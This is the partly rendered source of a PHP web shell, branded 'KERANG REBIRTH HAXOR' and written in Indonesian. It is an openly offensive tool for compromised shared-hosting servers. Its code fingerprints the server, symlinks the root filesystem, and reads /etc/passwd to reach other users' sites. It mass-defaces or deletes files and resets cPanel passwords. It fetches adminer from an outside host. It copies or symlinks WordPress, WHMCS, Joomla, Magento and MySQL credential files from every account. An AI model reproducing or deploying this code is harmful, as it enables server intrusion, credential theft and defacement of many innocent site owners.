.: h a x o r ♥ :.


dihanhaxor1337

Whatsapp | Github


KERANG REBIRTH HAXOR EDISI PERTAMA 2020 [ BUATAN OMEST ]

ON" : "OFF"; $ds = @ini_get("disable_functions"); $show_ds = (!empty($ds)) ? "$ds" : "NONE"; $soft = $_SERVER['SERVER_SOFTWARE']; $os = PHP_OS; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } echo "SERVER IP > ".gethostbyname($_SERVER['HTTP_HOST'])."
"; echo "KERNEL > ".php_uname()."
"; echo "PERANGKAT LUNAK > ".$soft."
"; echo "SISTEM OPERASI > ".$os."
"; echo "MODE AMAN > ".$sm."
"; echo "FUNGSI MATI > ".$show_ds."
"; echo "PENGGUNA > ".$user." (".$uid.") KELOMPOK > ".$group." (".$gid.")
"; ?>
".$perm."
"; } else { return "".$perm.""; } } function r($dir_raw,$perm) { if(!is_readable($dir_raw)) { return "".$perm.""; } else { return "".$perm.""; } } function perms($sdir){ $perms = fileperms($sdir); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } $dir_raw = str_replace('\\', "/", getcwd()); $host = $_SERVER['HTTP_HOST']; if($dn = $_GET['d']) { $_SESSION['dir'] = $dn; echo ""; } if(empty($_SESSION['dir'])) { $dir = $dir_raw; } else { $dir = $_SESSION['dir']; } $exp = explode("/", $dir); foreach($exp as $x=>$dirx) { if(empty($dirx)){ continue; } $do .= "
  • $dirx
  • \n"; } chdir($dir); ?>
    "; ?>
    ".$_FILES[dihan][name]." Berhasil Upload :)"; } else { echo "
    Gagal Upload ".$_FILES[dihan][name].":("; } } ?>
    [ PULANG RUMAH ] [ SYMLINK ] [ LOMPAT ] [ GRAB KONFIG ]
    [ ADMINER ] [ MASS DEFDEL ] [ AUTO RESS CPANEL ] [ KELUAR ]

    [ BUAT BERKAS ] [ BUAT FOLDER ]
    Shell@

    permission denied
    "; } else { $act = ""; } } echo $act; echo "
    Folder Name:
    "; } elseif($_GET['filec'] == "true"){ if($_POST['new_save_file']) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = ""; } else { $act = "permission denied"; } } echo $act; echo "
    Filename:
    "; } elseif($_GET['symlink'] == "true") { if(!is_dir("dihan_sym")) { mkdir("dihan_sym"); } if(!symlink("/", "dihan_sym/root")) { echo ".: SYMLINK :."; } $hta="Options Indexes FollowSymLinks\nDirectoryIndex defacer\nAddType txt .php\nAddHandler txt .php\n"; $htaccess=fopen("dihan_sym/.htaccess", "w"); fwrite($htaccess, $hta); fclose($htaccess); echo "

    "; $symlink = file_get_contents("/etc/passwd"); $lined=explode("\n", $symlink); echo ""; echo ""; foreach($lined as $line_x) { if(empty($line_x)) { continue; } $user_x = explode(":", $line_x); echo ""; } echo "
    UserSymlink
    $user_x[0]Symlink
    "; } elseif($_GET["jump"] == "true"){ $i = 0; echo "
    "; if(preg_match("/hsphere/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "
    ";
    			foreach($urls as $url) {
    				$url = str_replace(array("http://","www."), "", strtolower($url));
    				$etc = "/etc/passwd";
    				$f = fopen($etc,"r");
    				while($gets = fgets($f)) {
    					$pecah = explode(":", $gets);
    					$user = $pecah[0];
    					$dir_user = "/hsphere/local/home/$user";
    					if(is_dir($dir_user) === true) {
    						$url_user = $dir_user."/".$url;
    						if(is_readable($url_user)) {
    							$i++;
    							$jrw = "[R] $url_user";
    							if(is_writable($url_user)) {
    								$jrw = "[RW] $url_user";
    							}
    							echo $jrw."
    "; } } } } if($i == 0) { } else { echo "
    Total ada ".$i." Kamar di ".$ip; } echo "
    "; } else { echo '
    List Domains:

    '; } } elseif(preg_match("/vhosts|vhost/", $dir)) { preg_match("/\/var\/www\/(.*?)\//", $dir, $vh); $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "
    ";
    			foreach($urls as $url) {
    				$url = str_replace("www.", "", $url);
    				$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
    				if(is_dir($web_vh) === true) {
    					if(is_readable($web_vh)) {
    						$i++;
    						$jrw = "[R] $web_vh";
    						if(is_writable($web_vh)) {
    							$jrw = "[RW] $web_vh";
    						}
    						echo $jrw."
    "; } } } if($i == 0) { } else { echo "
    Total ada ".$i." Kamar di ".$ip; } echo "
    "; } else { echo '
    List Domains:

    '; } } else { echo "
    ";
    		$etc = fopen("/etc/passwd", "r") or die("tidak bisa membaca /etc/passwd");
    		while($passwd = fgets($etc)) {
    			if($passwd == '' || !$etc) {
    				echo "Can't read /etc/passwd";
    			} else {
    				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
    				foreach($user_jumping[1] as $user_dihan_jump) {
    					$user_jumping_dir = "/home/$user_dihan_jump/public_html";
    					if(is_readable($user_jumping_dir)) {
    						$i++;
    						$jrw = "[R] $user_jumping_dir";
    						if(is_writable($user_jumping_dir)) {
    							$jrw = "[RW] $user_jumping_dir";
    						}
    						echo $jrw;
    						if(function_exists('posix_getpwuid')) {
    							$domain_jump = file_get_contents("/etc/named.conf");	
    							if($domain_jump == '') {
    								echo " => ( gabisa ambil nama domain nya )
    "; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if($user_jumping_url == $user_dihan_jump) { echo " => ( $dj )
    "; break; } } } } else { echo "
    "; } } } } } if($i == 0) { } else { echo "
    Total ada ".$i." Kamar di ".$ip; } echo "
    "; } echo "
    "; } elseif($_GET["rcpanel"] == "true"){ echo '
     
    .: AUTO RESET PASSWORD CPANEL :. 



    '; ?> gak bisa di akses Onne-Chan

    "; } else { echo "
    Ini User Namenya Salin Lalu Gass

    "; echo '
    '; echo '
    Gass Disini

    '; ; } } } elseif($_GET["mass"] == "true"){ echo "
    \n"; $dirr=$_POST['d_dir']; $index = $_POST["script"]; $index = str_replace('"',"'",$index); $index = stripslashes($index); function edit_file($file,$index){ if (is_writable($file)) { clear_fill($file,$index); echo " [+] Nyabun 100% Successfull
    "; } else { echo " [-] Ternyata Tidak Boleh Menyabun Disini :(
    "; } } function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($lokasi)) { echo "[DELETED] $lokasi
    "; unlink($lokasi); $dihan = hapus_massal($dirc,$namafile); } } } } } } } function clear_fill($file,$index){ if(file_exists($file)){ $handle = fopen($file,'w'); fwrite($handle,''); fwrite($handle,$index); fclose($handle); } } function gass(){ global $dirr , $index ; chdir($dirr); $me = str_replace(dirname(__FILE__).'/','',__FILE__); $files = scandir($dirr) ; $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..","."); sort($files); $n = 0 ; foreach ($files as $file){ if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) { echo "
    $dirr/$file ====> "; edit_file($file,$index); flush(); $n = $n +1 ; } } echo "
    "; echo "

    $n Kali Anda Telah Ngecrot Disini


    "; } function ListFiles($dirrall) { if($dh = opendir($dirrall)) { $files = Array(); $inner_files = Array(); $me = str_replace(dirname(__FILE__).'/','',__FILE__); $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db"); while($file = readdir($dh)) { if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) { if(is_dir($dirrall . "/" . $file)) { $inner_files = ListFiles($dirrall . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dirrall . "/" . $file); } } } closedir($dh); return $files; } } function gass_all(){ global $index ; $dirrall=$_POST['d_dir']; foreach (ListFiles($dirrall) as $key=>$file){ $file = str_replace('//',"/",$file); echo "
    $file ===>"; edit_file($file,$index); flush(); } $key = $key+1; echo "

    $key Kali Anda Telah Ngecrot Disini


    "; } function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
    "; file_put_contents($lokasi, $isi_script); $dihan = sabun_massal($dirc,$namafile,$isi_script); } } } } } } if($_POST['mass'] == 'onedir') { echo "
    Versi Text Area



    Versi Text


    \n"; $mainpath=$_POST[d_dir];$file=$_POST[d_file]; $dir=opendir("$mainpath"); $code=base64_encode($_POST[script]); $indx=base64_decode($code); while($row=readdir($dir)){$start=@fopen("$row/$file","w+"); $finish=@fwrite($start,$indx); if ($finish){echo 'http://' . $row . '/' . $file . '
    '; } } } elseif($_POST['mass'] == 'sabunkabeh') { gass(); } elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); } elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); } elseif($_POST['mass'] == 'massdeface') { echo "
    "; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
    "; } else { echo "
    Select Type:

    Folder:

    Filename:

    Index File:

    "; } } elseif($_GET["adminer"] == "true"){ $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(file_exists('adminer.txt')) { echo "
    .: ADMINER LOGIN :.
    "; } else { if(adminer("https://www.bijnesbhai.com/css/adminer.txt","adminer.php")) { echo "
    -> adminer login <-
    "; } else { echo "
    gagal buat file adminer
    "; } } } elseif($_GET["config"] == "true"){ echo '

    Home :
    .htaccess :

    '; if ($_POST['conf']) { $home = $_POST['home']; $folfig = $home; @mkdir($folfig, 0755); @chdir($folfig); $htaccess = $_POST['ecchiexploit']; file_put_contents(".htaccess",$htaccess,FILE_APPEND); $passwd=explode("\n",$_POST["passwd"]); foreach($passwd as $pwd){ $user=trim($pwd); symlink('/','hanna_love'); copy('/'.$home.'/'.$user.'/.my.cnf',$user.' CPANEL'); symlink('/'.$home.'/'.$user.'/.my.cnf',$user.' CPANEL'); copy('/'.$home.'/'.$user.'/.accesshash',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/.accesshash',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' RESELLER.txt'); symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' RESELLER.txt'); symlink('/'.$home.'/'.$user.'/public_html/.accesshash',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' WHMCS or JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' WHMCS or JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.'WORDPRESS.txt'); copy('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.'WHMCS.txt'); copy('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.'JOOMLA.txt'); copy('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' MAGENTO.txt'); copy('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' PRESTASHOP.txt'); symlink('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.'WORDPRESS.txt'); symlink('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.'WHMCS.txt'); symlink('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.'JOOMLA.txt'); symlink('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.'JOOMLA.txt'); 